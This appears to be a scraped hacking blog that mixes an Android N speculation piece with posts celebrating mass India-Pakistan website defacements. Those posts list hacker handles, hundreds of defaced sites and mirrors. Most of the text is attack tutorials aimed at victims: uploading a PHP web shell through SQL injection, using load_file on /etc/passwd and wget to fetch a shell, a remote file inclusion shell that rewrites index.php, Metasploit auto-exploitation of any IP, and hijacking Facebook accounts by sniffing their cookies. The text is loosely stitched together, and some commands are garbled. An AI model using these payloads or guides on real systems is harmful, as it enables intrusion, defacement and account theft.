Why Android N is Going to Be the Biggest Change in Android’s History

android-n-nutella.jpgTurning a successful service enterprise into a product company is a feat that is difficult to achieve. Microsoft has been trying hard to accomplish it and Google is moving fast on the same track from past many years.

With Alphabet restructuring, Google is focusing more on making its operations more effective. Android is one of the biggest products of Google. And understanding the growing dominance of mobile, Google is moving ahead to combine its desktop-focused Chrome OS and the Android mobile OS.

As the media reports suggest, this convergence of Chrome OS and Android was in talks from some time and Android emerged as the obvious winner. If we compare the both, Chrome OS is less flexible and more secure. It has emerged as a winner in the schools due to its focus on education.

With Android Marshmallow, Google has made progress on the security front with mandatory encryption and secure boot. With the upcoming Android N, to be announced at Google I/O, we can expect Google to make a move towards more laptop-type bigger screen devices powered by an advanced Android OS.

Last month, Google announced its Pixel C tablet taking inspiration fromMicrosoft’s Surface Pro and Apple’s iPad Pro. Deciding which OS would be suitable to run the larger screen touch devices, Microsoft invented an OS that switches smoothly between tiles and desktop mode.

With the decision to kill the Chrome OS and fold its best features in the upcoming Android Nutella (Sorry! Unable to resist, I predict this name for Android N), Google is following the footsteps of Microsoft. Talking about the name predictions, Android Nougat is another strong contender.

android-nutella-n-cat-heavy-breathing

While Android Marshmallow focused on tightening the security hinges and making Android a corporate-suitable product, Android N will be a major change. Earlier this year, Google announced that the newer versions of Android will be free from unnecessary bloatware and Android N will the perfect platform to begin with.

Compared to Android Marshmallow, expect some bigger feature additions coming with Android N.

In the past, Google has Android-running bigger screen devices, but Android just didn’t feel right. This move to merge the Chrome OS and Android OS in Android N is Sundar Pichai’s attempt to make an OS that can run on all form factors. The Android operating system already runs on smartwatches, TV, tablets, phones – and adding the laptops in this list could be Android’s biggest step yet.

What are your expectations with Android N? Which name do you like better – Android Nutella or Android Nougat? Tell us in the comments below.

The Secuirty Resercher From India Adesh Nandkishor Listed in Microsoft Top 100 Security Resercher at 70th Position

The Secuirty Resercher From India Adesh Nandkishor Listed in Microsoft Top 100 Security Resercher at 70th Position

36473125_2066326896918772_8244847129546194944_nDkGF_pHVAAA6zmX.jpg largeCapture

19 Years Old Indian young man Adesh Nandkishor Kolte was among the 100 most respected hackers in the world by Microsoft at the BlackHat conference in America, and Adesh ranked 70 on the list.
“It’s a good feeling to see my name on this list that was published by Microsoft today,” the young man wrote on Facebook. “Let’s make the Internet a safer world than reality.”

Here’s the complete menu link:

https://blogs.technet.microsoft.com/msrc/2018/08/08/microsofts-top-100-security-researchers-black-hat-2018-edition

Indian Hacking teams Celebrates India’s 70th independence day by hacking down more than 500 pakistani sites

 

13912608_1055899691131253_42221782145687735_n

phpThumb_generated_thumbnail

After maintaining a long gap of silence for over 1 year, indian hackers finally showed their true colours on the occasion of India’s 70th independence day by hacking down over 350 pakistani sites, a dozen of uk sites and a bunch full of other country sites. Both side indian and pakistani hackers were battling with each other since decades. Prior to pakistan’s independence day on 14th august, pakistani hackers had defaced over a dozen of Indian sites to celebrate the occasion of their independence. And within just a single day indian hackers reverted the entire game by hacking more than 500 pakistani sites as payback for destroying the indian sites. Even hackers from all over the world from distant countries like AFGHANISTAN and PHILIPPINES join the yesterdays attack just to celebrate india’s independence day.
Some days ago a pak hacker MIYAN ALIYAN who goes by the name MR. VIRUS hacked a couple of sites namely policekhulasa.com and policesarkar.com and had wiped out entire data from the site that made the developer of the site Vijay Jadav beg infront of miyan to get all his data back. The cowner of those 2 sites was asking for a full refund back from the developer which forced him to beg to miyan for getting back the data. But miyan made fun of him by posting about him in facebook. The full data of the website had been blatantly wiped out without making any backup.
This enraged many indian hackers for giving them payback, some had even posted about the misdoings of mian in their deface in various sites.

Some uk sites had also been defaced by indian hackers. They mentioned the cause behind it as enslaving india for over 200 years.

Below are the some of the eminent teams that participated in the full blown attack yesterday

#LULZSECINDIA
#GhostINDIA
#Afgan cyber army
#Hell shield hackers
#Indian cyber security force
#Kerala cyber warriors
#Team hind hackers
#Philippine cyber army
#Indiskullz
#Indian black hats

Some of the eminent hackers behind this attack was
Mr.Cyb3rwarrior_Ades
S3r!0us_B14cK
AN0N.PH03N1X
gab4r
Mr.t1w4r1
D4S H4XOR
Jr.NTR
The Saint
Cyberwalker
Xyber worm
Hexking
Po panda
Dhani
Cyberl337
Spider64
Pinku mishra

Heres the list of all pak sites defaced by them

http://hanamedinst.com
http://ramzangloves.com
http://www.mxm-sports.com/
http://www.kellinind.com
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://www.csd.gov.pk/aadu.html
http://hjp.hec.gov.pk/uploads/aadu.html
http://hjp.hec.gov.pk/
http://www.pakistan.gov.pk
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/Sec.html
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://callistasurgical.com
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/15aug.html
http://fria.com.pk/15%20August.html
http://clginstitute.org
http://accipiterintl.com.pk/admin/
http://hjp.hec.gov.pk/uploads/gab4r.html
http://owaiiui.org/
http://csd.gov.pk/gab4r.html
http://kpptchangu.gov.pk/independence.php
http://actmacollege.edu.pk/indipendence.php http://emerson.edu.pk/indipendence.php
http://gpighyd.edu.pk/indipendence.php
http://www.biseatd.edu.pk/independence.php
http://aps.edu.pk/indipendence.php
http://www.albaih.com.pk
http://www.kurram.pk
http://haswani.com.pk/independence.php
http://www.trackschool.pk/independence.php
http://web-development.pk/independence.php
http://software-development.pk/independence.php
http://attrayantdesigns.com/independence.php
http://gap.org.pk/independence.php
http://kakakhelmarketing.pk/indipendence.php
http://imexintl.com.pk/indipendence.php
http://nbea.org.pk/independence.php
http://www.lbspak.com/independence.php
http://warningnews.pk/independence.php
http://amenterprises.pk/indipendence.php
http://altawakkalenterprises.pk/indipendence.php
http://soch.net.pk/indipendence.php
http://investorsinn.pk/indipendence.php
http://www.alphonsocorp.com/
http://www.ariverrunsthruit.com/
http://alpineint.com/indipendence.php
http://dogwoodk.com/indipendence.html
http://hkestates.pk/indipendence.php
http://esouq.pk/independence.php
http://almadar.co/indipendence.php
http://5brothersoverseas.com/indipendence.php
http://unicon.com.pk/indipendence.php
http://calyx.com.pk/indipendence.php
http://www.capoeira.com.pk/indipendence.php
http://arent.com.pk/indipendence.php
http://www.architectureplus.com.pk/indipendence.php
http://beyondbattle.com.pk/indipendence.php
http://www.akme.com.pk/indipendence.php
http://halalshop.pk/indipendence.php
http://contractus.pk/indipendence.php
http://smartcore.com.pk/indipendence.php
http://octopusvpn.com/independence.php
http://fmzfiresafety.com/independence.php
http://wrongno.pk/indipendence.php
http://www.feasiblesolutionpk.com/independence.php
http://www.cookawesome.com/independence.php
http://nwtlimited.com/independence.php
http://webads.pk/independence.php
http://synchro.com.pk/independence.php
http://britgaspar.com/independence.php
http://sociology.usindh.edu.pk/ind.html
http://iad.usindh.edu.pk/ind.html
http://iarscs.usindh.edu.pk/ind.html
http://iba.usindh.edu.pk/ind.html
http://exam.usindh.edu.pk/ind.html
http://iict.usindh.edu.pk/ind.html
http://imcs.usindh.edu.pk/ind.html
http://usindh.edu.pk
http://mbbscd.usindh.edu.pk/ind.html
http://ncearc.usindh.edu.pk/ind.html
http://new_joom.usindh.edu.pk/ind.html
http://oric.usindh.edu.pk/ind.html
http://qec.usindh.edu.pk/ind.html
http://sas.usindh.edu.pk/ind.html
http://scholars.usindh.edu.pk/ind.html
http://scholars.usindh.edu.pk/ind.html
http://student.usindh.edu.pk/ind.html
http://sucm.usindh.edu.pk/ind.html
http://sujo.usindh.edu.pk/ind.html
http://cmsu.usindh.edu.pk/index.html
http://ayutthaya.labour.go.th/India/
http://beneficenciaayacucho.gob.pe/india/
http://osh12.labour.go.th/india/
http://aclassictouchpainting.net/india/
http://advocaredaytonabeach.com/india/
http://advocarefloridastore.com/india/
http://advocarediscounts.com/india/
http://advocareonsale.com/india/
http://advocarespecials.com/india/
http://affordablebeachwedding.com/india/
http://assistedlivingdaytona.com/india/
http://assistedlivingportorange.com/india/
http://atlanticaesthetics.com/india/
http://atlanticeyecenter.com/india/
http://autoconsolecoversplus.com/india/
http://thebabyshoppeonline.com/india/
http://beachsidemedical.com/india/
http://beauidealplus.com/india/
http://edgewaterbizhub.com/india/
http://bucksgunrack.com/india/
https://pohlcnc.com/india/
http://cocosdoggydaycare.com/india/
http://cwrightlandscaping.com/india/
http://www.24daychallengeinfo.com/india/
http://daytonabeachwedding.net/india/
http://daytonaisgood.com/india/
http://daytonabeachphotographer.com/india/
http://daytonabeachweddingplanner.net/india/
http://dentistportorangefl.com/india/
http://diysecuritysystemsdaytonabeach.com/india/
http://3dmobilescan.com/india/
http://carlbennettchiropractic.com/india/
http://edgewaterlanding.com/india/
http://emcdivers.com/india/
http://epoxydaytona.com/india/
http://erosioncontrolfl.com/india/
http://drmache.com/india/
http://flarefittings.net/india/
http://frankreubeldesigns.com/india/
http://girlcamocosmetics.com/india/
http://hattygroup.com/india/
http://dosscapsdev.com/india.php
http://hillsfence.com/india/
http://hosthoteladvertising.com/india/
http://jasonscorner.com/india/
http://landscapingpalmcoastfl.com/india/
http://legacylaw313.com/india/
http://lewisheasterproperties.com/india/
http://www.lfwm.org/india/
http://livavedafl.com/india/
http://newsmyrnabeachlandscaping.com/india/
http://oakhillcommunitytrust.com/india/
http://ormondbeachweddings.com/india/
http://outlawschapel.com/india/
http://patientadvocatesflorida.com/india/
http://ponceinletwedding.com/india/
http://www.portorangeweddings.net/india/
http://printingdaytonabeach.com/india/
http://reliableautorepairservice.com/india/
http://reservestudypartners.com/india/
http://demands.pk/
https://www.talissadecor.com/india.php
http://jlseguridad.com/india.php
http://jjsur.com/india.php
http://loyolaayacucho.org.pe/india.php
http://anfasep.org.pe/india.php
http://ldfa.pe/india.php
http://beneficenciaayacucho.gob.pe/india.php
http://hiluxtrinidad.com/india.php
http://faharihilux.com/india.php
http://used-toyota-hilux.com/india.php
http://toyota-zambia.com/india.php
http://toyota-exporter.com/india.php
http://toyota-used-car.com/india.php
http://planethilux.com/india.php
http://hilux-kenya.com/india.php
http://dailytechdoze.com/india.php
http://singularsolution.net/india.php
http://www.montessoriacademyandcollege.co.za/india.php
http://hotelmathuranashik.com/india.php
http://perfectstyle.msk.ru/india.php
http://line-perfection.ru/india.php
http://conceptfashion.com/india.php
http://www.roznickaart.pl/india.php
http://tultpp.ru/india.php
http://k.ngskazka.ru/india.php
http://ngskazka.ru/india.php
http://v3.ngskazka.ru//india.php
http://vir.ngskazka.ru/india.php
http://shop.tristramboats.com/India/
http://taxi-odintsovo.ru/India/
http://xboxgaming.ir/india/
http://mijngestotter.nl/
http://inpt.tn/india/
http://airstill.com/India/
http://moninsyrup.com.au/India/
http://www.sherrybeer.com/India/
http://www.lav.com.ec/India/
http://tultpp.ru/india.php
http://www.entremusicos.cl/India/
http://7th-mc.com/india.html
http://sklepjubilerskidiament.pl/india.html
http://expaumi.org/wp/india.html
http://corporategiftsbangalore.com/india.html
http://clinicadentalreguera.com/mad.html
http://silvertreegroup.co.uk/india.php
http://hiluxtrinidad.com/india.php
http://sswebtesting.com/india.php
http://expaumi.org/wp/mad.html
http://hiluxtrinidad.com/india.php
http://www.thespringsrestaurant.com/india.php
http://rvaghasiaproperties.com/india.php
http://ugasaledd.com/india.php
http://allisonriggle.com/india.php
http://ayutthaya.labour.go.th/India/
http://shop.tristramboats.com/India/
http://taxi-odintsovo.ru/India/
http://xboxgaming.ir/india/
http://mijngestotter.nl/
http://inpt.tn/india/
http://airstill.com/India/
http://moninsyrup.com.au/India/
http://www.sherrybeer.com/India/
http://www.lav.com.ec/India/
http://tultpp.ru/india.php
http://www.entremusicos.cl/India/
http://www.rataj-spk.cz/India/
http://www.gorrotxategi.uk/India/
http://extra.delplast.fr/India/
http://www.vipcarstyleclub.com/India/
http://animeshop.si/India/
http://lafumashop.pl/modules/India/
http://www.elgallocojo.com/India/
http://brandonriggle.com/india.php
http://catherineriggle.com/india.php
http://clownbarf.com/india.php
http://eyemazingimages.com/india.php
http://leisurefoto.com/india.php
http://rigglerecipes.com/india.php
http://tarynonthenews.com/india.php
http://inhurd.unaab.edu.ng/india.php
http://beware-streetwear.com/india.php
http://marbleandtilecloseouts.com/india.php
https://www.steinhartwatches.de/india.php
http://wycart.com/india.php#
http://www.football-edge.com/india.php

The hacked uk sites are:

http://flyturkishairways.co.uk/
http://egyptairflights.co.uk/
http://www.flyqatarair.co.uk/
http://www.verda.ga/
http://flyethiopianflight.co.uk/
http://flyturkishairway.co.uk/
http://www.travelwideflights.co.uk/

Exclusive- भारतीय हैकरों का पाक को करारा जवाब, पाक सरकार की साइट हैक की

Exclusive- भारतीय हैकरों का पाक को करारा जवाब, पाक सरकार की साइट हैक की   War-Started

News Written BY Adesh kolte (blogger,hacker,Student)

 

phpThumb_generated_thumbnail15

अगस्त से पहले भारत-पाक में साइबर वाॅर शुरू, इंडिया के साइबर हैकर ग्रुप LulzSec ने हैक की साइट

pakistan.gov.pk Hacked By Lulzsec

पाकिस्तान  ने  गवर्मेंट इंजीनियरिंग जलगाँव  और ऐसे  कही Websites को हैक  किया

kashmiri cheetah  नामक  हैकर ने ये काम किया   और कही स्कूल  और इंडियन गवर्मेंट साईट पाक ने हैक कियी

इस्सी कारन इंडियन हच्केर्स ग्रुप  ने पाक की गवर्मेंट साइट्स को हैक करना स्टार्ट कर दिया

इंडियन हच्केर्स ग्रुप्स  के नाम सामने आये

#‎Indian_Cyber_Security_Force‬

#‎Indizkulzz‬

‪#‎ICG‬ ‪#‎

The_Mallu_Cyber_Solider‬ ‪#‎Hell_Shield_Hackers‬‪#‎

Indian_Black_Hats‬.

#‎Kerala_Cyber_Warriors‬ ‪#‎

Assam_Cyber_Warrior‬ &

‪#‎All_Indian_Hackers‬

pak Websites pwned by This TEam With The members leetname leaked

Mr.Cyb3rwarrior_Ades
S3r!0us_B14cK
AN0N.PH03N1X
gab4r
Baba420
MR.BLACK_H3X
Mr.t1w4r1
D4S H4XOR
Jr.NTR
Xyber worm
List of sites PAWNED TODAY by UNITED INDIAN HACKERS
http://hanamedinst.com
http://ramzangloves.com
http://www.mxm-sports.com/
http://www.kellinind.com
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://www.csd.gov.pk/aadu.html
http://hjp.hec.gov.pk/uploads/aadu.html
http://hjp.hec.gov.pk/
http://www.pakistan.gov.pk
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/Sec.html
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://callistasurgical.com
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/15aug.html
http://fria.com.pk/15%20August.html
http://clginstitute.org
http://accipiterintl.com.pk/admin/
http://hjp.hec.gov.pk/uploads/gab4r.html
http://owaiiui.org/
http://csd.gov.pk/gab4r.html
Team –
‪#‎Indian_Cyber_Army‬ | ‪#‎LulzSec_India‬ | ‪#‎Afghan_Cyber_Army‬ | ‪#‎Hell_Shield_Hackers‬ | ‪#‎Assam_Cyber_Warriors‬ | ‪#‎GhostINDIA‬ | ‪#‎IndiSkullz‬ | ‪#‎Kerala_Cyber_Warriors‬ | ‪#‎Philippine_Cyber_Army‬ | ‪#‎Indian_Cyber_Security_Force‬
‪#‎KeralaCyberWarriors‬
1) http://kpptchangu.gov.pk/independence.php
2) http://actmacollege.edu.pk/indipendence.php
3) http://emerson.edu.pk/indipendence.php
4) http://gpighyd.edu.pk/indipendence.php
5) http://www.biseatd.edu.pk/independence.php
6) http://aps.edu.pk/indipendence.php
7) http://www.albaih.com.pk
8) http://www.kurram.pk
9) http://haswani.com.pk/independence.php
10) http://www.trackschool.pk/independence.php
11) http://web-development.pk/independence.php
12) http://software-development.pk/independence.php
13) http://attrayantdesigns.com/independence.php
14) http://gap.org.pk/independence.php
15) http://kakakhelmarketing.pk/indipendence.php
16) http://imexintl.com.pk/indipendence.php
17) http://nbea.org.pk/independence.php
18) http://www.lbspak.com/independence.php
19) http://warningnews.pk/independence.php
20) http://amenterprises.pk/indipendence.php
21) http://altawakkalenterprises.pk/indipendence.php
22) http://soch.net.pk/indipendence.php
23) http://investorsinn.pk/indipendence.php
24) http://www.alphonsocorp.com/
25) http://www.ariverrunsthruit.com/
26) http://alpineint.com/indipendence.php
27) http://dogwoodk.com/indipendence.html
28) http://hkestates.pk/indipendence.php
29) http://esouq.pk/independence.php
30) http://almadar.co/indipendence.php
31) http://5brothersoverseas.com/indipendence.php
32) http://unicon.com.pk/indipendence.php
33) http://calyx.com.pk/indipendence.php
34) http://www.capoeira.com.pk/indipendence.php
35) http://arent.com.pk/indipendence.php
36) http://www.architectureplus.com.pk/indipendence.php
37) http://beyondbattle.com.pk/indipendence.php
38) http://www.akme.com.pk/indipendence.php
39) http://halalshop.pk/indipendence.php
40) http://contractus.pk/indipendence.php
41) http://smartcore.com.pk/indipendence.php
42) http://octopusvpn.com/independence.php
43) http://fmzfiresafety.com/independence.php
44) http://wrongno.pk/indipendence.php
45) http://www.feasiblesolutionpk.com/independence.php
46) http://www.cookawesome.com/independence.php
47) http://nwtlimited.com/independence.php
48) http://webads.pk/independence.php
49) http://synchro.com.pk/independence.php
50) http://britgaspar.com/independence.php
1: http://sociology.usindh.edu.pk/ind.html
2 http://iad.usindh.edu.pk/ind.html
3 http://iarscs.usindh.edu.pk/ind.html
4 http://iba.usindh.edu.pk/ind.html
5 http://exam.usindh.edu.pk/ind.html
6 http://iict.usindh.edu.pk/ind.html
7 http://imcs.usindh.edu.pk/ind.html
8 http://usindh.edu.pk
9 http://mbbscd.usindh.edu.pk/ind.html
10 http://ncearc.usindh.edu.pk/ind.html
11 http://new_joom.usindh.edu.pk/ind.html
12 http://oric.usindh.edu.pk/ind.html
13 http://qec.usindh.edu.pk/ind.html
14 http://sas.usindh.edu.pk/ind.html
15 http://scholars.usindh.edu.pk/ind.html
16 http://scholars.usindh.edu.pk/ind.html
17 http://student.usindh.edu.pk/ind.html
18 http://sucm.usindh.edu.pk/ind.html
19 http://sujo.usindh.edu.pk/ind.html
20 http://cmsu.usindh.edu.pk/index.html
Mirror Done : http://zone-h.org/mirror/id/26674396
http://zone-h.org/mirror/id/26674430
http://zone-h.org/mirror/id/26674430
http://zone-h.org/mirror/id/26674396
http://zone-h.org/mirror/id/26674433
http://zone-h.org/mirror/id/26674464
http://zone-h.org/mirror/id/26674474
http://zone-h.org/mirror/id/26674479
http://zone-h.org/mirror/id/26674480
http://zone-h.org/mirror/id/26674464
http://zone-h.org/mirror/id/26674484
http://zone-h.org/mirror/id/26674485
http://zone-h.org/mirror/id/26674485
http://zone-h.org/mirror/id/26674512

 

 

How to Upload Shell From SQL injection !Hruday Charan

 

 first of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually Depends On your Capability !

But You need 2 main things Here:

  1. Root Path of the website 
  2. A Writable Directory 
Most of the time, you will see root path in SQL error of that site.Like the following one : Example

” Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in/home/hruday/public_html/functions.php on the line 1327 

But , If the vulnerable website doesn’t show the root path then don’t worry i will show you how to know the root path. And Also Writable Directory. :

http://www.site.com/index.php?id=10′

I am not starting with abc of SQLI I hope u know the basics 😀 ,
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column ,

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5–
http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5–

Let’s Try To Load Files Of The Website : 

We Won’t Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This :

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5–

Our Current Username is etc mine is HrudayCharan ;
Now Check File Privilages for User HrudayCharan ;

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user=’HrudayCharan’–

If it shows Y (yes) on the vulnerable column of the website , that means we have the file privileges for the current user HrudayCharan
And if it doesn’t show Y then Don’t waste your time there 😀
Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.

” Server Spy Adon: https://addons.mozilla.org/en-us/firefox/addon/server-spy/

You can use havij and some other tool too to detect webserver type.
To know the webserver by file /etc/passwd use this query

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file(‘/etc/passwd’),5–

now we have our webserver etc (/home/Hruday) :
now read one more file.

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘etc/HrudayCharan.conf’)4,5–

Where HrudayCharan is your webserver soft name like server name.conf .
now we have Obtained the root path

/home/site.com/public_html etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too 😀

site http://www.site.com/dir/*/*/*/*/

so its site.com/Hruday is writeable
now we will upload our evil code

 ” http://www.site.com/index.php?id=10 UniOn SeleCt 1,2,”<?system($_REQUEST[‘cmd’]);?>”,4,5 into outfile ‘/home/site/public_html/Hruday/’WRITABLE_DIRECTORY’/hny.php’–+ “

ok now we have to execute our commands :

http://www.site.com/writeable_directory/hny.php?cmd=pwd ” OR
” COMMANDS YOU BASICALLY USE IN LINUX 😀 “

Now we will use wget command to upload our evil script : 3:) The Evil Attempt 😀

http://www.site.com/writeable_directory/hny.php?cmd=wget http://site.com/honey.txt -O honey.php” 

Now Open it . You Got Ready ! GoHere : http://www.site.com/WRITABLE_directory/honey.php And eNjoy The Shell 😀
Enjoy Hacking by Adesh kolte

How To Hack A Remote Computer Using IP Address( Addi haxor)

How To Hack A Remote Computer Using IP Address

Hacking a remote computer is always a hot topic among hackers and crackers, a newbie hacker or someone who wants to learn hacking always ask these questions that how to hack into a computer by just knowing the IP address of victim computer.

Today in this article I am going to explain step by step procedure to hack computer using IP address. But this tutorial is possible only when your friend’s / victim computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

How To Hack A Remote Computer Using IP Address

Step 1: First you need to download Metasploit. The most up-to-date version is FREE at http://metasploit.com/

Step 2: You need PostgrSQL for your database. Download here: http://www.postgresql.org/.
Make sure you use all the defaults or Metasploit woun’t work!

Step 3: Now lets get down to buisness… After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5…

Pic : http://bit.ly/14rL5Ro

Step 4: Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this : http://bit.ly/T5fjWT

Step 5: Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don’t wory, this is normal.

Step 6: Type db_host to make sure you are connected correctally.

Step 7: Now type this:

db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000…

Step 8: Now we get to the fun part; the automatic exploitation.
Just type

db_autopwn -t -p -e -s -b ,

watch the auto-exploitation start, go play Halo for a while, and then come back…

Step 9: After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

Step 10: Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber
The features of Metasploit are mutch like a rat. Once you get into someone’s computer, you can see their screen, controll their mouse, see what they type, see them, etc.

So friends, I hope this How To Hack A Remote Computer Using IP Address tutorial will be useful for you. If you have any problem in this How To Hack A Remote Computer Using IP Address tutorial,

RFI Remote file inclusion by Addi_haxor

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux

Starting with RFI

Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks.If you don’t have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out. Lets check it out.

http://victimsite.com/index.php?page=http://adeshsite.com/evilscript.txt

I have included a custom script “evilscript” in text format from my website, which contains some code.Now, if its a vulnerable website, then any of these 3 things can happen

  • Case 1 – You might have noticed that the url consisted of “page=home” had no extension, but I have included an extension in my url,hence the site may give an error like ‘failure to include evilscript.txt.txt’, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  • Case 2 – In case, it automatically appends something in the lines of .php then we have to use a null byte ‘%00’ in order to avoid error.
  • Case 3 – successfull execution 🙂

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we  go

<?php
echo “alert(U 4r3 0wn3d !!);”;
echo “Run command: “.htmlspecialchars($_GET[‘cmd’]);

system($_GET[‘cmd’]);
?>

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So, if you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using ‘pwd’ and ‘ls’ command

http//victimsite.com/index.php?cmd=pwd&page=http://adeshsite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://adeshsite.com/ourscript

What it does is that it sends the command as cmd we put in our script and begins print the working directory and list the documents.Even better you can almost make the page proclaim that you hacked it by using the ‘echo’ command.

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it.In case, its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files. Now as expected, we are now the alpha and the omega of the website 🙂 we can download, remove, rename, anything! Want to download stuff ? try the ‘wget’ function…

I leave the rest to your creativity !

have any Que call me frndzzz

:Adesh kolte

How to Hack Facebook Account Using Wireshark

Overview :-
                           Today we will be discussing about how to hack a facebook account using facebook chat.This can be done using a network analyser tool e.g Wiresh ark .You can also use backtrack and run wireshark in it .Now you have to chat with the victim fastly so that the data sent to you and from your victim to you can reach into wireshark and the wireshark would be enable to retrieve cookies from the data packets.
So basically you will be directly logged into victims account rather knowing his/her password.But thats enough for us 😉

Procedure :- 

STEP # 1 :- Download n install Wireshark . Download from Here

STEP # 2 :- Now Click on Caputre button and Start sniffing packets Note that you should also chat with your victim fastly so that more and more packets could reach us.


Above are our captured packets and below is the details of them.

STEP # 3 :- Now Ping http://facebook.com and search its IP-Address from below Captured packets and search for HTTP protocol through GET/home.php . If you can’t find one search forHTTP GET for Cookies.



STEP # 4 :- Now Right click on it and see its detailed there will be 9-10 cookies information that are 
stored by Facebook.com into Victims PC.Copy All to Note Pad. 


STEP # 5 :- Now Facebook Cookie format is “Datr” . Copy all these cookie information and openmozilla firefox and Add each cookie using cookie editor.Adds on For Mozilla


STEP # 6 :- After adding each cookie this should be like this.


STEP # 7 :- Now Open Facebook Home Page and you will find yourself logged into Victims PC.
Enjoy but this was for Educational and Informational Purpose only. This should work in Lan with Hub only.

HACK FACEBOOK BY COOKIE STEALING ENJOy.. (Adesh kolte )

HACK FACEBOOK BY COOKIE STEALING
ENJOy..

Three days ago I finished the series on Gmail Session Hijacking and Cookie Stealing , due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep(On a Wifi Network Only), which I won’t be explaining here because I have already written it before in my post Facebook Hacking Made Easy With Firesheep
In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to hack your facebook account, Before reading this tutorial I would recommend you to part1, part2 and part 3 of my Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here.
Gmail Cookie Stealing And Session Hijacking Part 1
Gmail Cookie Stealing And Session Hijacking Part 2
Gmail Cookie Stealing And Session Hijacking Part 3
Facebook Authentication Cookies

The cookie which facebook uses to authenticate it’s users is called “Datr”, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account?

An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

Step 1 – First of all download wireshark from the official website and install it.

Step 2 – Next open up wireshark click on analyze and then click on interfaces.

Step 3 – Next choose the appropriate interface and click on start.

Step 4 – Continue sniffing for around 10 minutes.

Step 5 – After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 – Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.

Step 7 – Next right click on it and goto Copy – Bytes – Printable Text only.

